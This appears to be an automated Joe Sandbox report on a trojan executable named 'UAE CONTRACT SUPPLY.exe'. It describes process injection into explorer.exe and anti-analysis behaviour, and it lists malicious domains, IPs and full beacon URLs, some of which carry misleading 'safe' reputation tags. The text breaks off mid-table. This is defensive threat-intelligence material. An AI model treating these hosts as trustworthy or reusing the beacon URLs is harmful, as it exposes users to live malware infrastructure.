      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358403 Sample: UAE CONTRACT SUPPLY.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 31 www.sixteen3handscottages.com 2->31 33 www.joybirder.com 2->33 35 2 other IPs or domains 2->35 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 9 other signatures 2->53 11 UAE CONTRACT SUPPLY.exe 1 2->11         started        signatures3 process4 signatures5 63 Tries to detect Any.run 11->63 65 Hides threads from debuggers 11->65 14 UAE CONTRACT SUPPLY.exe 6 11->14         started        process6 dnsIp7 43 googlehosted.l.googleusercontent.com 142.250.184.65, 443, 49731 GOOGLEUS United States 14->43 45 doc-08-78-docs.googleusercontent.com 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 3 other signatures 14->73 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 37 td-balancer-dc11-60-102.wixdns.net 185.230.60.102, 49749, 80 WIX_COMIL Israel 18->37 39 allsalesvinyl.net 34.102.136.180, 49751, 49752, 49756 GOOGLEUS United States 18->39 41 10 other IPs or domains 18->41 55 System process connects to network (likely due to code injection or exploit) 18->55 22 chkdsk.exe 18->22         started        25 autoconv.exe 18->25         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      UAE CONTRACT SUPPLY.exe34%VirustotalBrowse
      UAE CONTRACT SUPPLY.exe37%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      16.2.chkdsk.exe.5bc7960.5.unpack100%AviraTR/Dropper.GenDownload File
      16.2.chkdsk.exe.fd4f08.1.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      td-balancer-dc11-60-102.wixdns.net0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.allsalesvinyl.net/w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.pardsoda.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g==0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.parentseducationalco-op.com/w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.aserchofalltrades.com/w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sixteen3handscottages.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg==0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sixteen3handscottages.com
      		34.102.136.180
      		truetrue
        		unknown
        td-balancer-dc11-60-102.wixdns.net
        		185.230.60.102
        		truetrueunknown
        parentseducationalco-op.com
        		34.102.136.180
        		truetrue
          		unknown
          www.pardsoda.com
          		104.21.32.11
          		truetrue
            		unknown
            googlehosted.l.googleusercontent.com
            		142.250.184.65
            		truefalse
              		high
              allsalesvinyl.net
              		34.102.136.180
              		truetrue
                		unknown
                www.blackholidayco.com
                		unknown
                		unknowntrue
                  		unknown
                  www.joybirder.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.allsalesvinyl.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.sixteen3handscottages.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.aserchofalltrades.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.asesorgrupovivir.com
                          		unknown
                          		unknowntrue
                            		unknown
                            doc-08-78-docs.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              www.parentseducationalco-op.com
                              		unknown
                              		unknowntrue
                                		unknown
                                cdn.onenote.net
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.allsalesvinyl.net/w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.pardsoda.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g==true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.parentseducationalco-op.com/w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.aserchofalltrades.com/w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sixteen3handscottages.com/w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg==true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers?explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.tiro.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designersexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comlexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.typography.netDexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fontfabrik.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fonts.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.sandoll.co.krexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleaseexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sakkal.comexplorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.184.65
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        185.230.60.102
                                                        		unknownIsrael
                                                        		58182WIX_COMILtrue
                                                        104.21.32.11
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        34.102.136.180
                                                        		unknownUnited States
                                                        		15169GOOGLEUStrue

                                                        General Information

                                                        Joe Sandbox Version:31.0.0 Emerald
                                                        Analysis ID:358403
                                                        Start date:25.02.2021
                                                        Start time:15:25:36
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:UAE CONTRACT SUPPLY.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@8/0@10/4
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 53% (good quality ratio 44%)
                                                        • Quality average: 66.4%
                                                        • Quality standard deviation: 35.8%
                                                        HCA Information:
                                                        • Successful, ratio: 61%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 104.43.139.144, 142.250.184.46, 51.104.139.180, 52.155.217.156, 20.54.26.129, 8.248.147.254, 67.27.233.254, 67.27.159.254, 8.248.143.254, 67.26.83.254, 51.103.5.159, 104.43.193.48, 92.122.213.194, 92.122.213.247, 2.17.179.193, 13.64.90.137, 184.30.20.56, 51.11.168.160
                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        185.230.60.1022S6VUd960E.exeGet hashmaliciousBrowse
                                                        • www.thepoetrictedstudio.com/bw82/?JB4DY2=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&w0G=jzuDZX7xC
                                                        34.102.136.18014079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                                        • www.ubiqshop.com/suod/
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • www.whitley360insurancegroup.com/e3rp/?j8pPk=im8RK5hojyiovjoWpCByoAyExdKu9PCH/DHixFeIJgIWbd9/JUshX+E76zrtzOGwSvQG&iJ=yL3dpJexppT
                                                        dCoLEiYyx1.exeGet hashmaliciousBrowse
                                                        • www.wewantvote.com/hks/?S2Jdyv=JR-TT8a8bz4&o2=QYUxBxXkCeZVJNfFWSJsk3IBeYXPZgc2nH/dDvQY/XbZkPs+fhYBerosKyprHHiIEPgfedaFww==
                                                        GDJWHqItQO.exeGet hashmaliciousBrowse
                                                        • www.lesavonbyannvictoria.com/dyt/?w8l=2w8yK74E/w9lysTpUayEk1uIR8qyDanCFlUeVmIM4yvirp/OCQwAlXgQpx9jKZ5pn0hJ&Tj-=YvLpZ
                                                        Shipment Document BL,INV and packing list.exeGet hashmaliciousBrowse
                                                        • www.parkcitysongfest.com/nehc/?Jnz=9rSpeXq0adO&yrsDIlWx=LMAhfecU0y34Tx1TbWeWAS4HEN0+4+sZND0z+5CMXKz3uB8Td4f40r/k+tJO9eUuw3oDNFlv+g==
                                                        PO_210224.exeGet hashmaliciousBrowse
                                                        • www.jeetinternationalgroup.com/kbc/?mlvx=rTYX5btw1iIIHoMYt3wFv5EHXrCgun0pSs+f973Cl/VGhbEqDDvdvpBnQB7WKQvfWEf2&Ntilqd=8p4pqfAhA
                                                        2021_02_25.exeGet hashmaliciousBrowse
                                                        • www.bistrolartichaut.com/gbr/?kDHl=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIdVdDj4pEKFF2KGGA==&Kzr4=SnjtLZExJt
                                                        55gfganfgF.exeGet hashmaliciousBrowse
                                                        • www.gdsjgf.com/bw82/?_FQl2b=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZHtOEFX/CqJe2Vx/Q==&oX9=Z0D4XL4pfLe8-hP
                                                        yrsTO0ER4V.exeGet hashmaliciousBrowse
                                                        • www.bitcoinrewardsu.info/kre/?YvBxMNmh=kQkeQIpKJNb6oOxJN4GJfD6t5KY2AsRnmRWhQl1X7YIrKxWbjtaZnp5PaacD5HNrGJbroy9C/A==&_jATiR=UfdDO4MxCVo
                                                        RQP_10378065.exeGet hashmaliciousBrowse
                                                        • www.ikescakes.com/mt6e/?mtxhc=YvExCURCHojWxUZ2uMbCTZtdlUfUNESptwc+9N4MwoafLt15MUIAAry7fUZG5aHTuU8f+mfXxQ==&rVXHzf=lnRpL0YpGPdD
                                                        Price quotation.exeGet hashmaliciousBrowse
                                                        • www.womenreadytomove.com/uidr/?pRrXnjX=+yHJuk7akGgRjMzjPF0aFAvqX/p+12T9a3qHSG6UxUVEi0VJLVtNHRJTw/YZCKaLJ9IS&NtTD4P=XPjPRje8qFgxsfb
                                                        DHL Shipping Document_Pdf.exeGet hashmaliciousBrowse
                                                        • www.elementclubhouse.com/dll/?ArDDXx=WR3E3vwyc/GreSyJ7XmSowICMkI8sNumnp0OkvNXbOz2Qb0q9qTQClQxRjHoqSrBttUl&VnwDZ=-Z2hAFrpEtCxkjI
                                                        MT.Au Leo V.1420.xlsxGet hashmaliciousBrowse
                                                        • www.hakimkhawatmi.com/nsag/?jv84=9Tl2KXc7hN/2U9N9+vpX/czO0Yy7ZBOWuVeFqMNCcJII52Iatjzlz6fsfLitv4s31iy/dQ==&1bCd=jpXpdpDpF
                                                        dwg.exeGet hashmaliciousBrowse
                                                        • www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ
                                                        orders.exeGet hashmaliciousBrowse
                                                        • www.suncobrayoga.com/ni6e/?W6=+pZLjlAoRu3DtzXq35lSkEUB/ZsZHJe08VokdK2HVDHLsmWw5RNCvrmnDtoZrYQiiN4bm+0CXw==&UlPt=GVoxsVvHVpd8Sl
                                                        Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                        • www.hk-attorneys.com/uqf5/?Y4pXFx5x=Dg97rDlyoxn6rzyVbv3B7zG329WThiiFJjF/QU5oHVDRmmZSVK6c1XVEPf5rJpTqyNbYXr1Rqw==&BR-=UTjHnDN0Jp9hlD
                                                        9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                        • www.vio-lence-official.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Km50rYfCIMLkr6cNBQUAIfaJzg7DBzOfrqOCbjSFoXRiVQSa2PRHXyZRZ9uV6+yeKg7N
                                                        3zutY8IPBS.exeGet hashmaliciousBrowse
                                                        • www.chapelcouture.com/ffw/?uZCX=XPjPaXeHqZ5XiDl&Jzr8URRX=Q3EGYcSU8t2GK6ftjW66hePdz5cilHQXw0NtnM1D8Yj3A1BwaX/+ESmEZzWdZeCCWyTt
                                                        IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                        • www.srcsvcs.com/bw82/?9rjHF6y=idg9JX97F3eVuJ82V/BLVAmaLrIGTHqm4FsH2lIA1Y64HTHcmGyQxV9x71/09hThPInxOEDyHA==&lX9d=p48hVnrp1tqPRT7P
                                                        U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                        • www.wholesalerbargains.com/nsag/?GVgT1=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU4mnryJvfB01hf9UaA==&6l=SlSp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        googlehosted.l.googleusercontent.comBL.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        caraganas.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        #U266b VM_540283.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        _vm54959395930.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        Malone3388_001.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        dgaTCZovz.msiGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        2021-Nieuwepayroll-Aanpassing.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        seed.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        PO112000891122110.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        xerox for hycite.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        Muligheds.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        2021-Nouvelle masse salariale-Rapport.htmlGet hashmaliciousBrowse
                                                        • 216.58.209.33
                                                        SOLICITUD DE HERJIMAR, SL (HJM-745022821).exeGet hashmaliciousBrowse
                                                        • 216.58.208.161
                                                        #U6211#U662f#U56fe#U7247.exeGet hashmaliciousBrowse
                                                        • 216.58.208.161
                                                        OneNote rmos@dataflex-int.com.htmlGet hashmaliciousBrowse
                                                        • 216.58.208.129
                                                        Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        barcelona-v-psg-liv-uefa-2021.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        Barcelona-v-PSG-0tv.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exeGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        td-balancer-dc11-60-102.wixdns.net2S6VUd960E.exeGet hashmaliciousBrowse
                                                        • 185.230.60.102

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        WIX_COMILNEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                        • 185.230.60.177
                                                        2S6VUd960E.exeGet hashmaliciousBrowse
                                                        • 185.230.60.102
                                                        https://alijafari6.wixsite.com/owa-projection-aspxGet hashmaliciousBrowse
                                                        • 185.230.61.98
                                                        https://xmailexpact.wixsite.com/mysiteGet hashmaliciousBrowse
                                                        • 185.230.61.179
                                                        http://vcomdesign.comGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        https://samson442.wixsite.com/outlook-webGet hashmaliciousBrowse
                                                        • 185.230.60.197
                                                        http://tecasi.rs/tree/?email=adsdkljfds.sadkf@asdkg.comGet hashmaliciousBrowse
                                                        • 185.230.60.163
                                                        https://infozapyt.wixsite.com/mysiteGet hashmaliciousBrowse
                                                        • 185.230.60.179
                                                        https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                        • 185.230.61.179
                                                        Swift Copy.exeGet hashmaliciousBrowse
                                                        • 185.230.61.96
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.168
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.168
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.101
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        https://imsva91-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2ftecasi.rs%2fPAF&umid=EF9759F9-B31F-8705-A867-F303FCD5E066&auth=25994e11723456f59f881b7e4162635112e7401d-23077e0b296f1a694cd81697d46ee85967e5556eGet hashmaliciousBrowse
                                                        • 185.230.60.180
                                                        https://outlookonedriveupd.wixsite.com/officeGet hashmaliciousBrowse
                                                        • 185.230.60.98
                                                        https://ademkeskin.wixsite.com/owa-projection-aspxGet hashmaliciousBrowse
                                                        • 185.230.61.163
                                                        https://outlookmicrosoftwo.wixsite.com/upgradeGet hashmaliciousBrowse
                                                        • 185.230.60.98
                                                        https://www.shutdown-turnaround-industry-network.com/unsubscribeGet hashmaliciousBrowse
                                                        • 185.230.60.177
                                                        GOOGLEUS14079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                        • 142.250.184.74
                                                        tuOAqyHVuH.exeGet hashmaliciousBrowse
